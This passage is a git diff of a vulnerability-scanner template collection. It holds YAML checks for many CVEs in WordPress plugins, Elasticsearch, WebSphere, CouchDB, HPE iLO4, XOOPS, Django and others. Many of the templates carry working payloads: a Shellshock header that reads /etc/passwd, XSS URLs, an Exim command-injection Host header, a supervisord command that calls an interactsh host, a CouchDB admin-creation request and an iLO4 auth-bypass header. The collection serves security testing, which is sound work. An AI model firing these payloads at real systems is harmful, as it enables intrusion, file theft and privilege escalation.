Referer: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + Cookie: "() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd " + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + part: body + regex: + - "root:.*:0:0:" + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/cve-2014-9094.yaml b/poc/cve/cve-2014-9094.yaml old mode 100755 new mode 100644 index 81ae8ce817..57224692e1 --- a/poc/cve/cve-2014-9094.yaml +++ b/poc/cve/cve-2014-9094.yaml @@ -1,11 +1,18 @@ id: CVE-2014-9094 info: - name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting + name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - tags: cve,2014,wordpress,xss,wp-plugin + description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + - http://websecurity.com.ua/7152/ + - http://seclists.org/fulldisclosure/2014/Jul/65 + - http://www.securityfocus.com/bid/68525 + classification: + cve-id: CVE-2014-9094 + tags: cve,cve2014,wordpress,xss,wp-plugin requests: - method: GET @@ -17,7 +24,6 @@ requests: - type: word words: - "" - part: body - type: word part: header @@ -27,3 +33,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/25 diff --git a/poc/cve/cve-2015-5531.yaml b/poc/cve/cve-2015-5531.yaml index a2eacdaac3..f60c575c93 100644 --- a/poc/cve/cve-2015-5531.yaml +++ b/poc/cve/cve-2015-5531.yaml @@ -1,10 +1,10 @@ id: CVE-2015-5531 info: - name: ElasticSearch <1.6.1 - Local File Inclusion + name: ElasticSearch directory traversal vulnerability (CVE-2015-5531) author: princechaddha severity: high - description: ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. + description: Directory traversal vulnerability in Elasticsearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls. reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 @@ -55,5 +55,3 @@ requests: - type: status status: - 400 - -# Enhanced by mp on 2022/06/08 diff --git a/poc/cve/cve-2015-6920.yaml b/poc/cve/cve-2015-6920.yaml new file mode 100644 index 0000000000..555bed6a26 --- /dev/null +++ b/poc/cve/cve-2015-6920.yaml @@ -0,0 +1,36 @@ +id: CVE-2015-6920 + +info: + name: sourceAFRICA <= 0.1.3 - Unauthenticated Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: WordPress sourceAFRICA plugin version 0.1.3 suffers from a cross site scripting vulnerability. + reference: + - https://packetstormsecurity.com/files/133371/ + - https://nvd.nist.gov/vuln/detail/CVE-2015-6920 + - http://packetstormsecurity.com/files/133371/WordPress-sourceAFRICA-0.1.3-Cross-Site-Scripting.html + - https://wpvulndb.com/vulnerabilities/8169 + classification: + cve-id: CVE-2015-6920 + tags: cve,cve2015,wordpress,wp-plugin,xss + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - '">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2015-7450.yaml b/poc/cve/cve-2015-7450.yaml index f1e282a76f..4f0418f4b2 100644 --- a/poc/cve/cve-2015-7450.yaml +++ b/poc/cve/cve-2015-7450.yaml @@ -1,20 +1,21 @@ id: CVE-2015-7450 info: - name: IBM WebSphere Java Object Deserialization RCE + name: IBM WebSphere Java Object Deserialization - Remote Code Execution author: wdahlenb severity: critical - description: Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default) + description: IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default). reference: - https://github.com/Coalfire-Research/java-deserialization-exploits/blob/main/WebSphere/websphere_rce.py - https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7450 - tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java + - http://www-01.ibm.com/support/docview.wss?uid=swg21972799 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2015-7450 cwe-id: CWE-94 + tags: cve,cve2015,websphere,deserialization,rce,oast,ibm,java requests: - raw: @@ -54,3 +55,5 @@ requests: part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" + +# Enhanced by mp on 2022/05/10 diff --git a/poc/cve/cve-2016-1000126.yaml b/poc/cve/cve-2016-1000126.yaml index 7570661517..e2b9a6d7ed 100644 --- a/poc/cve/cve-2016-1000126.yaml +++ b/poc/cve/cve-2016-1000126.yaml @@ -4,14 +4,18 @@ info: name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: Reflected XSS in wordpress plugin admin-font-editor v1.8 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 + - https://wordpress.org/plugins/admin-font-editor + - http://www.securityfocus.com/bid/93896 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000126 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2016-1000129.yaml b/poc/cve/cve-2016-1000129.yaml index fbeb35821b..159bd01e94 100644 --- a/poc/cve/cve-2016-1000129.yaml +++ b/poc/cve/cve-2016-1000129.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin defa-online-image-protector v3.3 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000129 + - https://wordpress.org/plugins/defa-online-image-protector + - http://www.vapidlabs.com/wp/wp_advisory.php?v=449 + - http://www.securityfocus.com/bid/93892 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000129 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2016-1000132.yaml b/poc/cve/cve-2016-1000132.yaml new file mode 100644 index 0000000000..f8b05ac8dc --- /dev/null +++ b/poc/cve/cve-2016-1000132.yaml @@ -0,0 +1,39 @@ +id: CVE-2016-1000132 + +info: + name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 + - https://wordpress.org/plugins/enhanced-tooltipglossary + - http://www.securityfocus.com/bid/93865 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2016-1000132 + cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2016-1000134.yaml b/poc/cve/cve-2016-1000134.yaml index d11a917306..41b08f9096 100644 --- a/poc/cve/cve-2016-1000134.yaml +++ b/poc/cve/cve-2016-1000134.yaml @@ -5,13 +5,17 @@ info: author: daffainfo severity: medium description: Reflected XSS in wordpress plugin hdw-tube v1.2 - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 - tags: cve,cve2016,wordpress,xss,wp-plugin + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000134 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=530 + - https://wordpress.org/plugins/hdw-tube + - http://www.securityfocus.com/bid/93868 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000134 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2016-1000137.yaml b/poc/cve/cve-2016-1000137.yaml index cd7de43aba..559d5ca9f7 100644 --- a/poc/cve/cve-2016-1000137.yaml +++ b/poc/cve/cve-2016-1000137.yaml @@ -1,15 +1,14 @@ id: CVE-2016-1000137 info: - name: WordPress Hero Maps Pro 2.1.0 - Cross-Site Scripting + name: Hero Maps Pro 2.1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Hero Maps Pro 2.1.0 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + description: Reflected XSS in wordpress plugin hero-maps-pro v2.1.0 reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=658 - https://wordpress.org/plugins/hero-maps-pro - - http://web.archive.org/web/20210123183224/https://www.securityfocus.com/bid/93815/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000137 + - http://www.securityfocus.com/bid/93815 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -37,5 +36,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/12 diff --git a/poc/cve/cve-2016-1000141.yaml b/poc/cve/cve-2016-1000141.yaml index 635ff46c5f..6b37cdd77b 100644 --- a/poc/cve/cve-2016-1000141.yaml +++ b/poc/cve/cve-2016-1000141.yaml @@ -5,16 +5,17 @@ info: author: daffainfo severity: medium description: WordPress plugin Page-layout-builder v1.9.3 contains a cross-site scripting vulnerability. - remediation: Upgrade to version 2.0 or higher. reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=358 - https://nvd.nist.gov/vuln/detail/CVE-2016-1000141 - tags: cve,cve2016,wordpress,xss,wp-plugin + - https://wordpress.org/plugins/page-layout-builder + remediation: Upgrade to version 2.0 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000141 cwe-id: CWE-79 + tags: cve,cve2016,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/cve/cve-2016-1000143.yaml b/poc/cve/cve-2016-1000143.yaml index 090c6d4c73..37b57b29af 100644 --- a/poc/cve/cve-2016-1000143.yaml +++ b/poc/cve/cve-2016-1000143.yaml @@ -1,14 +1,14 @@ id: CVE-2016-1000143 info: - name: WordPress Photoxhibit 2.1.8 - Cross-Site Scripting + name: Photoxhibit v2.1.8 - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress Photoxhibit 2.1.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + description: Reflected XSS in wordpress plugin photoxhibit v2.1.8 reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=780 - - https://wordpress.org/plugins/photoxhibit - https://nvd.nist.gov/vuln/detail/CVE-2016-1000143 + - https://wordpress.org/plugins/photoxhibit classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 @@ -36,5 +36,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/12 diff --git a/poc/cve/cve-2016-1000146.yaml b/poc/cve/cve-2016-1000146.yaml index f14bf4f330..e5f3bb2231 100644 --- a/poc/cve/cve-2016-1000146.yaml +++ b/poc/cve/cve-2016-1000146.yaml @@ -4,14 +4,18 @@ info: name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 - tags: cve,cve2016,wordpress,xss,wp-plugin,mail + description: Reflected XSS in wordpress plugin pondol-formmail v1.1 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000146 + - http://www.vapidlabs.com/wp/wp_advisory.php?v=787 + - https://wordpress.org/plugins/pondol-formmail + - http://www.securityfocus.com/bid/93584 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000146 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin pondol-formmail v1.1" + tags: cve,cve2016,wordpress,xss,wp-plugin,mail requests: - method: GET diff --git a/poc/cve/cve-2016-10033.yaml b/poc/cve/cve-2016-10033.yaml index cdae3cc13f..17b510dc45 100644 --- a/poc/cve/cve-2016-10033.yaml +++ b/poc/cve/cve-2016-10033.yaml @@ -1,9 +1,20 @@ id: CVE-2016-10033 + info: - name: Wordpress 4.6 Remote Code Execution + name: WordPress PHPMailer < 5.2.18 Remote Code Execution author: princechaddha - severity: high - reference: https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + severity: critical + description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport. + reference: + - https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html + - https://nvd.nist.gov/vuln/detail/CVE-2016-10033 + - https://www.exploit-db.com/exploits/40970/ + - https://www.exploit-db.com/exploits/40968/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2016-10033 + cwe-id: CWE-77 tags: wordpress,cve,cve2016,rce requests: @@ -11,18 +22,12 @@ requests: - |+ GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - Connection: close - |+ POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) - Connection: close - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Accept: */* - Content-Length: 56 Content-Type: application/x-www-form-urlencoded wp-submit=Get+New+Password&redirect_to=&user_login={{username}} @@ -36,7 +41,6 @@ requests: part: body regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?")' - '!contains(body_3, "")' condition: and - # Enhanced by mp on 2022/04/12 diff --git a/poc/cve/cve-2016-10993.yaml b/poc/cve/cve-2016-10993.yaml index 0f3716e9fe..4d4d53806e 100644 --- a/poc/cve/cve-2016-10993.yaml +++ b/poc/cve/cve-2016-10993.yaml @@ -4,16 +4,17 @@ info: name: ScoreMe Theme - Unauthenticated Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter. reference: - https://www.vulnerability-lab.com/get_content.php?id=1808 - https://nvd.nist.gov/vuln/detail/CVE-2016-10993 - tags: cve,cve2016,wordpress,wp-theme,xss + - https://wpvulndb.com/vulnerabilities/8431 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 + cvss-score: 5.4 cve-id: CVE-2016-10993 cwe-id: CWE-79 - description: "The ScoreMe theme through 2016-04-01 for WordPress has XSS via the s parameter." + tags: cve,cve2016,wordpress,wp-theme,xss requests: - method: GET diff --git a/poc/cve/cve-2016-4975.yaml b/poc/cve/cve-2016-4975.yaml index 1fa0c07573..ad77d61eda 100644 --- a/poc/cve/cve-2016-4975.yaml +++ b/poc/cve/cve-2016-4975.yaml @@ -5,10 +5,10 @@ info: author: melbadry9,nadino,xElkomy severity: medium description: Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir. - remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. reference: - https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 - https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 + remediation: Upgrade to Apache HTTP Server 2.2.32/2.4.25 or higher. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 diff --git a/poc/cve/cve-2016-7981.yaml b/poc/cve/cve-2016-7981.yaml index a15b21c00b..645a590895 100644 --- a/poc/cve/cve-2016-7981.yaml +++ b/poc/cve/cve-2016-7981.yaml @@ -6,13 +6,17 @@ info: severity: medium description: | Cross-site scripting (XSS) vulnerability in valider_xml.php in SPIP 3.1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the var_url parameter in a valider_xml action. - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-7981 - tags: cve,cve2016,xss,spip + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-7981 + - https://core.spip.net/projects/spip/repository/revisions/23202 + - https://core.spip.net/projects/spip/repository/revisions/23201 + - https://core.spip.net/projects/spip/repository/revisions/23200 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-7981 cwe-id: CWE-79 + tags: cve,cve2016,xss,spip requests: - method: GET diff --git a/poc/cve/cve-2017-10974.yaml b/poc/cve/cve-2017-10974.yaml index 3d99cc4194..7b1821919c 100644 --- a/poc/cve/cve-2017-10974.yaml +++ b/poc/cve/cve-2017-10974.yaml @@ -4,14 +4,18 @@ info: name: Yaws 1.91 - Remote File Disclosure author: 0x_Akoko severity: high - reference: https://www.exploit-db.com/exploits/42303 + description: Yaws 1.91 allows Unauthenticated Remote File Disclosure via HTTP Directory Traversal with /%5C../ to port 8080 + reference: + - https://www.exploit-db.com/exploits/42303 + - https://nvd.nist.gov/vuln/detail/CVE-2017-10974 + - https://www.exploit-db.com/exploits/42303/ + - http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-10974 cwe-id: CWE-22 - tags: cve,cve2017,yaws,rfd,lfi - + tags: cve,cve2017,yaws,lfi requests: - method: GET @@ -30,4 +34,4 @@ requests: - type: dsl dsl: - - '!contains(tolower(body), " + supervisor.supervisord.options.warnings.linecache.os.system + + + nslookup {{interactsh-url}} + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - "dns" + + - type: word + part: header + words: + - "text/xml" + + - type: word + part: body + words: + - "" + - "" + condition: and diff --git a/poc/cve/cve-2017-12138.yaml b/poc/cve/cve-2017-12138.yaml index f1dcb57708..f8205c321b 100644 --- a/poc/cve/cve-2017-12138.yaml +++ b/poc/cve/cve-2017-12138.yaml @@ -3,26 +3,35 @@ id: CVE-2017-12138 info: name: XOOPS Core 2.5.8 - Open Redirect author: 0x_Akoko - severity: low + severity: medium description: XOOPS Core 2.5.8 has a stored URL redirect bypass vulnerability in /modules/profile/index.php because of the URL filter. reference: - https://github.com/XOOPS/XoopsCore25/issues/523 + - https://xoops.org - https://www.cvedetails.com/cve/CVE-2017-12138 - tags: cve,cve2017,redirect,xoops classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2017-12138 cwe-id: CWE-601 + tags: cve,cve2017,redirect,xoops,authenticated requests: - - method: GET + - raw: + - | + POST /user.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded - path: - - '{{BaseURL}}/xoops/modules/profile/index.php?op=main&xoops_redirect=https://www.example.com' + uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login + - | + GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true matchers: - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$' part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2017-12542.yaml b/poc/cve/cve-2017-12542.yaml new file mode 100644 index 0000000000..9bd0b6ab7e --- /dev/null +++ b/poc/cve/cve-2017-12542.yaml @@ -0,0 +1,43 @@ +id: CVE-2017-12542 + +info: + name: HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass + author: pikpikcu + severity: critical + description: HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability. + reference: + - https://www.exploit-db.com/exploits/44005 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12542 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us + - https://www.exploit-db.com/exploits/44005/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2017-12542 + tags: cve,cve2017,ilo4,hpe,auth-bypass + +requests: + - method: GET + path: + - "{{BaseURL}}/rest/v1/AccountService/Accounts" + + headers: + Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "iLO User" + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/11 diff --git a/poc/cve/cve-2017-12544.yaml b/poc/cve/cve-2017-12544.yaml new file mode 100644 index 0000000000..36efd6b1d9 --- /dev/null +++ b/poc/cve/cve-2017-12544.yaml @@ -0,0 +1,39 @@ +id: CVE-2017-12544 + +info: + name: HPE System Management - XSS + author: divya_mudgal + severity: medium + description: Reflected Cross-site scripting (XSS) on HPE System Management + reference: + - https://seclists.org/fulldisclosure/2018/Mar/5 + - https://nvd.nist.gov/vuln/detail/CVE-2017-12544 + - https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbmu03753en_us + - http://www.securitytracker.com/id/1039437 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2017-12544 + cwe-id: CWE-79 + tags: cve,cve2017,xss,hp + +requests: + - method: GET + path: + - "{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//" + + matchers-condition: and + matchers: + - type: word + words: + - "var prodName = '';prompt`document.domain`;//';" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2017-12583.yaml b/poc/cve/cve-2017-12583.yaml index 232be74216..3fcc19e269 100644 --- a/poc/cve/cve-2017-12583.yaml +++ b/poc/cve/cve-2017-12583.yaml @@ -4,15 +4,16 @@ info: name: Reflected XSS in doku.php author: DhiyaneshDK severity: medium - metadata: - shodan-query: 'http.title:"DokuWiki"' - description: "DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php." - reference: https://github.com/splitbrain/dokuwiki/issues/2061 + description: DokuWiki through 2017-02-19b has XSS in the at parameter (aka the DATE_AT variable) to doku.php. + reference: + - https://github.com/splitbrain/dokuwiki/issues/2061 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-12583 cwe-id: CWE-79 + metadata: + shodan-query: http.title:"DokuWiki" tags: cve,cve2017,xss,dokuwiki requests: diff --git a/poc/cve/cve-2017-12635.yaml b/poc/cve/cve-2017-12635.yaml new file mode 100644 index 0000000000..2999c299a2 --- /dev/null +++ b/poc/cve/cve-2017-12635.yaml @@ -0,0 +1,55 @@ +id: CVE-2017-12635 + +info: + name: Apache CouchDB 1.7.0 / 2.x < 2.1.1 - Remote Privilege Escalation + author: pikpikcu + severity: critical + description: Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2017-12635 + - https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E + - http://www.securityfocus.com/bid/101868 + - https://security.gentoo.org/glsa/201711-16 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2017-12635 + cwe-id: CWE-269 + tags: cve,cve2017,couchdb,apache + +requests: + - raw: + - | + PUT /_users/org.couchdb.user:poc HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + + { + "type": "user", + "name": "poc", + "roles": ["_admin"], + "roles": [], + "password": "123456" + } + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + - "Location:" + + - type: word + part: body + words: + - "org.couchdb.user:poc" + - "conflict" + - "Document update conflict" + + - type: status + status: + - 201 + - 409 + +# Enhanced by mp on 2022/05/11 diff --git a/poc/cve/cve-2017-12794.yaml b/poc/cve/cve-2017-12794.yaml index ad1ea847cc..02b2f66ae2 100644 --- a/poc/cve/cve-2017-12794.yaml +++ b/poc/cve/cve-2017-12794.yaml @@ -1,20 +1,22 @@ id: CVE-2017-12794 info: - name: Django debug page XSS + name: Django Debug Page - Cross-Site Scripting author: pikpikcu severity: medium + description: | + Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with "DEBUG = True" is not on by default (which is what makes the page visible). reference: - https://twitter.com/sec715/status/1406779605055270914 - https://nvd.nist.gov/vuln/detail/CVE-2017-12794 - description: | - In Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5, HTML autoescaping was disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allowed a cross-site scripting attack. This vulnerability shouldn't affect most production sites since you shouldn't run with "DEBUG = True" (which makes this page accessible) in your production settings. - tags: xss,django,cve,cve2017 + - https://www.djangoproject.com/weblog/2017/sep/05/security-releases/ + - http://www.securitytracker.com/id/1039264 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2017-12794 cwe-id: CWE-79 + tags: xss,django,cve,cve2017 requests: - method: GET @@ -36,3 +38,5 @@ requests: words: - "text/html" part: header + +# Enhanced by mp on 2022/04/26 diff --git a/poc/cve/cve-2017-14135.yaml b/poc/cve/cve-2017-14135.yaml new file mode 100644 index 0000000000..3f7e57637b --- /dev/null +++ b/poc/cve/cve-2017-14135.yaml @@ -0,0 +1,46 @@ +id: CVE-2017-14135 + +info: + name: OpenDreambox 2.0.0 - Remote Code Execution + author: alph4byt3 + severity: critical + description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py. + reference: + - https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/ + - https://www.exploit-db.com/exploits/42293 + - https://nvd.nist.gov/vuln/detail/CVE-2017-14135 + - 